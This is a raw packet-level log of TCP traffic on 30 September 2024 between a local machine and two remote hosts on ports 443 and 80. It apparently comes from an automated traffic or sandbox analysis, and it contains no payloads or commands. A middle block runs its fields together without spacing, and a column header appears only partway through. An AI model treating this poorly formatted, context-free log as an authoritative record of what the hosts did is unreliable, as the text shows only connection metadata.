Sep 30, 2024 09:53:25.824666977 CEST    49165      443  192.168.2.22     172.67.216.244
Sep 30, 2024 09:53:25.824686050 CEST      443    49165  172.67.216.244   192.168.2.22
Sep 30, 2024 09:53:26.290174007 CEST      443    49165  172.67.216.244   192.168.2.22
Sep 30, 2024 09:53:26.290277004 CEST    49165      443  192.168.2.22     172.67.216.244
Sep 30, 2024 09:53:26.297611952 CEST    49165      443  192.168.2.22     172.67.216.244
Sep 30, 2024 09:53:26.297621965 CEST      443    49165  172.67.216.244   192.168.2.22
Sep 30, 2024 09:53:26.297909021 CEST      443    49165  172.67.216.244   192.168.2.22
Sep 30, 2024 09:53:26.297982931 CEST    49165      443  192.168.2.22     172.67.216.244
Sep 30, 2024 09:53:26.463382006 CEST    49165      443  192.168.2.22     172.67.216.244
Sep 30, 2024 09:53:26.511411905 CEST      443    49165  172.67.216.244   192.168.2.22
Sep 30, 2024 09:53:27.239551067 CEST      443    49165  172.67.216.244   192.168.2.22
Sep 30, 2024 09:53:27.239604950 CEST    49165      443  192.168.2.22     172.67.216.244
Sep 30, 2024 09:53:27.239633083 CEST      443    49165  172.67.216.244   192.168.2.22
Sep 30, 2024 09:53:27.239653111 CEST      443    49165  172.67.216.244   192.168.2.22
Sep 30, 2024 09:53:27.239686966 CEST    49165      443  192.168.2.22     172.67.216.244
Sep 30, 2024 09:53:27.239701986 CEST    49165      443  192.168.2.22     172.67.216.244
Sep 30, 2024 09:53:27.255732059 CEST    49165      443  192.168.2.22     172.67.216.244
Sep 30, 2024 09:53:27.255747080 CEST      443    49165  172.67.216.244   192.168.2.22
Sep 30, 2024 09:53:27.414360046 CEST    49166       80  192.168.2.22     192.3.220.22
Sep 30, 2024 09:53:27.420080900 CEST       80    49166  192.3.220.22     192.168.2.22
Sep 30, 2024 09:53:27.420851946 CEST    49166       80  192.168.2.22     192.3.220.22
Sep 30, 2024 09:53:27.476290941 CEST    49166       80  192.168.2.22     192.3.220.22
Sep 30, 2024 09:53:27.481775999 CEST       80    49166  192.3.220.22     192.168.2.22
Sep 30, 2024 09:53:27.893821001 CEST       80    49166  192.3.220.22     192.168.2.22
Sep 30, 2024 09:53:27.893845081 CEST       80    49166  192.3.220.22     192.168.2.22
Sep 30, 2024 09:53:27.893856049 CEST       80    49166  192.3.220.22     192.168.2.22
Sep 30, 2024 09:53:27.893866062 CEST       80    49166  192.3.220.22     192.168.2.22
Sep 30, 2024 09:53:27.893877983 CEST       80    49166  192.3.220.22     192.168.2.22
Sep 30, 2024 09:53:27.893887997 CEST       80    49166  192.3.220.22     192.168.2.22
Sep 30, 2024 09:53:27.893910885 CEST       80    49166  192.3.220.22     192.168.2.22
Sep 30, 2024 09:53:27.893923044 CEST       80    49166  192.3.220.22     192.168.2.22
Sep 30, 2024 09:53:27.893924952 CEST    49166       80  192.168.2.22     192.3.220.22
Sep 30, 2024 09:53:27.893924952 CEST    49166       80  192.168.2.22     192.3.220.22
Sep 30, 2024 09:53:27.893933058 CEST       80    49166  192.3.220.22     192.168.2.22
Sep 30, 2024 09:53:27.893944979 CEST       80    49166  192.3.220.22     192.168.2.22
Sep 30, 2024 09:53:27.893970966 CEST    49166       80  192.168.2.22     192.3.220.22
Sep 30, 2024 09:53:27.893970966 CEST    49166       80  192.168.2.22     192.3.220.22
Sep 30, 2024 09:53:27.893970966 CEST    49166       80  192.168.2.22     192.3.220.22
Sep 30, 2024 09:53:27.898921013 CEST       80    49166  192.3.220.22     192.168.2.22
Sep 30, 2024 09:53:27.898932934 CEST       80    49166  192.3.220.22     192.168.2.22
Sep 30, 2024 09:53:27.898943901 CEST       80    49166  192.3.220.22     192.168.2.22
Sep 30, 2024 09:53:27.898972988 CEST    49166       80  192.168.2.22     192.3.220.22
Sep 30, 2024 09:53:27.900700092 CEST    49166       80  192.168.2.22     192.3.220.22
Sep 30, 2024 09:53:27.900700092 CEST    49166       80  192.168.2.22     192.3.220.22
Sep 30, 2024 09:53:27.981539011 CEST       80    49166  192.3.220.22     192.168.2.22
Sep 30, 2024 09:53:27.981658936 CEST       80    49166  192.3.220.22     192.168.2.22
Sep 30, 2024 09:53:27.981671095 CEST       80    49166  192.3.220.22     192.168.2.22
Sep 30, 2024 09:53:27.981682062 CEST       80    49166  192.3.220.22     192.168.2.22
Sep 30, 2024 09:53:27.981720924 CEST    49166       80  192.168.2.22     192.3.220.22
Sep 30, 2024 09:53:27.981775999 CEST       80    49166  192.3.220.22     192.168.2.22
Sep 30, 2024 09:53:27.981806040 CEST    49166       80  192.168.2.22     192.3.220.22
Sep 30, 2024 09:53:27.981818914 CEST    49166       80  192.168.2.22     192.3.220.22
Sep 30, 2024 09:53:27.981960058 CEST       80    49166  192.3.220.22     192.168.2.22
Sep 30, 2024 09:53:27.981971979 CEST       80    49166  192.3.220.22     192.168.2.22
Sep 30, 2024 09:53:27.981982946 CEST       80    49166  192.3.220.22     192.168.2.22
Sep 30, 2024 09:53:27.981997967 CEST    49166       80  192.168.2.22     192.3.220.22
Sep 30, 2024 09:53:27.982008934 CEST    49166       80  192.168.2.22     192.3.220.22
Sep 30, 2024 09:53:27.982129097 CEST       80    49166  192.3.220.22     192.168.2.22
Sep 30, 2024 09:53:27.982947111 CEST       80    49166  192.3.220.22     192.168.2.22
Sep 30, 2024 09:53:27.982958078 CEST       80    49166  192.3.220.22     192.168.2.22
Sep 30, 2024 09:53:27.982968092 CEST       80    49166  192.3.220.22     192.168.2.22
Sep 30, 2024 09:53:27.982978106 CEST       80    49166  192.3.220.22     192.168.2.22
Sep 30, 2024 09:53:27.983011007 CEST    49166       80  192.168.2.22     192.3.220.22
Sep 30, 2024 09:53:27.983011007 CEST    49166       80  192.168.2.22     192.3.220.22
Sep 30, 2024 09:53:27.983547926 CEST       80    49166  192.3.220.22     192.168.2.22
Sep 30, 2024 09:53:27.983558893 CEST       80    49166  192.3.220.22     192.168.2.22
Sep 30, 2024 09:53:27.983570099 CEST       80    49166  192.3.220.22     192.168.2.22
Sep 30, 2024 09:53:27.983580112 CEST       80    49166  192.3.220.22     192.168.2.22
Sep 30, 2024 09:53:27.983589888 CEST       80    49166  192.3.220.22     192.168.2.22
Sep 30, 2024 09:53:27.983596087 CEST    49166       80  192.168.2.22     192.3.220.22
Sep 30, 2024 09:53:27.983619928 CEST    49166       80  192.168.2.22     192.3.220.22
Sep 30, 2024 09:53:27.983619928 CEST    49166       80  192.168.2.22     192.3.220.22
Sep 30, 2024 09:53:27.984299898 CEST       80    49166  192.3.220.22     192.168.2.22
Sep 30, 2024 09:53:27.984442949 CEST       80    49166  192.3.220.22     192.168.2.22
Sep 30, 2024 09:53:27.984456062 CEST       80    49166  192.3.220.22     192.168.2.22
Sep 30, 2024 09:53:27.984493017 CEST    49166       80  192.168.2.22     192.3.220.22
Sep 30, 2024 09:53:27.984570980 CEST       80    49166  192.3.220.22     192.168.2.22
Sep 30, 2024 09:53:27.984582901 CEST       80    49166  192.3.220.22     192.168.2.22
Sep 30, 2024 09:53:27.984610081 CEST    49166       80  192.168.2.22     192.3.220.22
Sep 30, 2024 09:53:27.984622955 CEST    49166       80  192.168.2.22     192.3.220.22
Sep 30, 2024 09:53:27.987355947 CEST       80    49166  192.3.220.22     192.168.2.22
                                                                            Sep 30, 2024 09:53:27.987369061 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:27.987417936 CEST4916680192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:28.067734957 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:28.067749023 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:28.067759991 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:28.067775965 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:28.067789078 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:28.067814112 CEST4916680192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:28.067821980 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:28.067831039 CEST4916680192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:28.067831039 CEST4916680192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:28.067836046 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:28.067848921 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:28.067874908 CEST4916680192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:28.067883968 CEST4916680192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:28.067981958 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:28.067992926 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:28.068003893 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:28.068013906 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:28.068025112 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:28.068036079 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:28.068032980 CEST4916680192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:28.068032980 CEST4916680192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:28.068053961 CEST4916680192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:28.068064928 CEST4916680192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:28.068603992 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:28.068665981 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:28.068676949 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:28.068703890 CEST4916680192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:28.068712950 CEST4916680192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:28.068717957 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:28.068730116 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:28.068741083 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:28.068752050 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:28.068759918 CEST4916680192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:28.068762064 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:28.068772078 CEST4916680192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:28.068784952 CEST4916680192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:28.069284916 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:28.069295883 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:28.069307089 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:28.069335938 CEST4916680192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:28.069350004 CEST4916680192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:28.069401026 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:28.069411993 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:28.069422960 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:28.069436073 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:28.069448948 CEST4916680192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:28.069463015 CEST4916680192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:28.069470882 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:28.069478035 CEST4916680192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:28.069484949 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:28.069497108 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:28.069519997 CEST4916680192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:28.069533110 CEST4916680192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:28.070224047 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:28.070235014 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:28.070247889 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:28.070271015 CEST4916680192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:28.070295095 CEST4916680192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:28.070306063 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:28.070317030 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:28.070327044 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:28.070338964 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:28.070354939 CEST4916680192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:28.070378065 CEST4916680192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:28.070378065 CEST4916680192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:28.070382118 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:28.070394039 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:28.070405960 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:28.070430994 CEST4916680192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:28.070440054 CEST4916680192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:28.071171045 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:28.071182966 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:28.071193933 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:28.071209908 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:28.071218014 CEST4916680192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:28.071221113 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:28.071229935 CEST4916680192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:28.071234941 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:28.071238041 CEST4916680192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:28.071257114 CEST4916680192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:28.071268082 CEST4916680192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:28.073000908 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:28.073020935 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:28.073069096 CEST4916680192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:28.105006933 CEST4916680192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:28.154591084 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:28.154614925 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:28.154628038 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:28.154638052 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:28.154650927 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:28.154654980 CEST4916680192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:28.154664040 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:28.154678106 CEST8049166192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:28.154679060 CEST4916680192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:28.154690027 CEST4916680192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:28.154712915 CEST4916680192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:30.734574080 CEST4916680192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.029359102 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.034364939 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.034440994 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.034559965 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.039297104 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.512454033 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.512480974 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.512492895 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.512505054 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.512516975 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.512518883 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.512518883 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.512526989 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.512540102 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.512543917 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.512550116 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.512552977 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.512564898 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.512583017 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.512615919 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.512626886 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.512653112 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.512660980 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.514714956 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.517575026 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.517626047 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.517673016 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.517713070 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.599961996 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.599983931 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.599997997 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.600011110 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.600102901 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.600141048 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.600158930 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.600171089 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.600183964 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.600188971 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.600195885 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.600205898 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.600219011 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.600234032 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.601001024 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.601011992 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.601023912 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.601063013 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.601072073 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.601078033 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.601092100 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.601136923 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.601145029 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.601762056 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.601808071 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.601810932 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.601823092 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.601843119 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.601850033 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.601855993 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.601878881 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.601893902 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.602617025 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.602663994 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.602672100 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.602683067 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.602709055 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.602716923 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.605118990 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.605130911 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.605144024 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.605182886 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.687406063 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.687422991 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.687436104 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.687484026 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.687500954 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.687511921 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.687531948 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.687541008 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.687551022 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.687551022 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.687551022 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.687551022 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.687562943 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.687575102 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.687575102 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.687586069 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.687601089 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.687618971 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.687637091 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.687648058 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.687653065 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.687659025 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:34.687670946 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.687680960 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.687757015 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:34.687834024 CEST4916780192.168.2.22192.3.220.22
Timestamp                            Source Port  Dest Port  Source IP      Dest IP
Sep 30, 2024 09:53:34.688446045 CEST  80           49167      192.3.220.22   192.168.2.22
Sep 30, 2024 09:53:34.688456059 CEST  80           49167      192.3.220.22   192.168.2.22
Sep 30, 2024 09:53:34.688467979 CEST  80           49167      192.3.220.22   192.168.2.22
Sep 30, 2024 09:53:34.688488007 CEST  49167        80         192.168.2.22   192.3.220.22
Sep 30, 2024 09:53:34.688513994 CEST  80           49167      192.3.220.22   192.168.2.22
Sep 30, 2024 09:53:34.688524008 CEST  80           49167      192.3.220.22   192.168.2.22
Sep 30, 2024 09:53:34.688532114 CEST  49167        80         192.168.2.22   192.3.220.22
Sep 30, 2024 09:53:34.688534975 CEST  80           49167      192.3.220.22   192.168.2.22
Sep 30, 2024 09:53:34.688545942 CEST  80           49167      192.3.220.22   192.168.2.22
Sep 30, 2024 09:53:34.688548088 CEST  49167        80         192.168.2.22   192.3.220.22
Sep 30, 2024 09:53:34.688558102 CEST  80           49167      192.3.220.22   192.168.2.22
Sep 30, 2024 09:53:34.688564062 CEST  49167        80         192.168.2.22   192.3.220.22
Sep 30, 2024 09:53:34.688580036 CEST  49167        80         192.168.2.22   192.3.220.22
Sep 30, 2024 09:53:34.688596964 CEST  49167        80         192.168.2.22   192.3.220.22
Sep 30, 2024 09:53:34.689205885 CEST  80           49167      192.3.220.22   192.168.2.22
Sep 30, 2024 09:53:34.689218044 CEST  80           49167      192.3.220.22   192.168.2.22
Sep 30, 2024 09:53:34.689234018 CEST  80           49167      192.3.220.22   192.168.2.22
Sep 30, 2024 09:53:34.689244032 CEST  49167        80         192.168.2.22   192.3.220.22
Sep 30, 2024 09:53:34.689255953 CEST  49167        80         192.168.2.22   192.3.220.22
Sep 30, 2024 09:53:34.689335108 CEST  80           49167      192.3.220.22   192.168.2.22
Sep 30, 2024 09:53:34.689346075 CEST  80           49167      192.3.220.22   192.168.2.22
Sep 30, 2024 09:53:34.689357996 CEST  80           49167      192.3.220.22   192.168.2.22
Sep 30, 2024 09:53:34.689368963 CEST  80           49167      192.3.220.22   192.168.2.22
Sep 30, 2024 09:53:34.689374924 CEST  49167        80         192.168.2.22   192.3.220.22
Sep 30, 2024 09:53:34.689379930 CEST  80           49167      192.3.220.22   192.168.2.22
Sep 30, 2024 09:53:34.689390898 CEST  80           49167      192.3.220.22   192.168.2.22
Sep 30, 2024 09:53:34.689393044 CEST  49167        80         192.168.2.22   192.3.220.22
Sep 30, 2024 09:53:34.689405918 CEST  49167        80         192.168.2.22   192.3.220.22
Sep 30, 2024 09:53:34.689416885 CEST  49167        80         192.168.2.22   192.3.220.22
Sep 30, 2024 09:53:34.689826965 CEST  80           49167      192.3.220.22   192.168.2.22
Sep 30, 2024 09:53:34.689836979 CEST  80           49167      192.3.220.22   192.168.2.22
Sep 30, 2024 09:53:34.689847946 CEST  80           49167      192.3.220.22   192.168.2.22
Sep 30, 2024 09:53:34.689872026 CEST  49167        80         192.168.2.22   192.3.220.22
Sep 30, 2024 09:53:34.689893007 CEST  49167        80         192.168.2.22   192.3.220.22
Sep 30, 2024 09:53:34.689918041 CEST  80           49167      192.3.220.22   192.168.2.22
Sep 30, 2024 09:53:34.689929008 CEST  80           49167      192.3.220.22   192.168.2.22
Sep 30, 2024 09:53:34.689939022 CEST  80           49167      192.3.220.22   192.168.2.22
Sep 30, 2024 09:53:34.689949989 CEST  80           49167      192.3.220.22   192.168.2.22
Sep 30, 2024 09:53:34.689954042 CEST  49167        80         192.168.2.22   192.3.220.22
Sep 30, 2024 09:53:34.689961910 CEST  49167        80         192.168.2.22   192.3.220.22
Sep 30, 2024 09:53:34.689980984 CEST  49167        80         192.168.2.22   192.3.220.22
Sep 30, 2024 09:53:34.690006018 CEST  80           49167      192.3.220.22   192.168.2.22
Sep 30, 2024 09:53:34.690016985 CEST  80           49167      192.3.220.22   192.168.2.22
Sep 30, 2024 09:53:34.690027952 CEST  80           49167      192.3.220.22   192.168.2.22
Sep 30, 2024 09:53:34.690038919 CEST  80           49167      192.3.220.22   192.168.2.22
Sep 30, 2024 09:53:34.690038919 CEST  49167        80         192.168.2.22   192.3.220.22
Sep 30, 2024 09:53:34.690052032 CEST  49167        80         192.168.2.22   192.3.220.22
Sep 30, 2024 09:53:34.690068960 CEST  49167        80         192.168.2.22   192.3.220.22
Sep 30, 2024 09:53:34.690758944 CEST  80           49167      192.3.220.22   192.168.2.22
Sep 30, 2024 09:53:34.690804005 CEST  49167        80         192.168.2.22   192.3.220.22
Sep 30, 2024 09:53:34.690808058 CEST  80           49167      192.3.220.22   192.168.2.22
Sep 30, 2024 09:53:34.690819979 CEST  80           49167      192.3.220.22   192.168.2.22
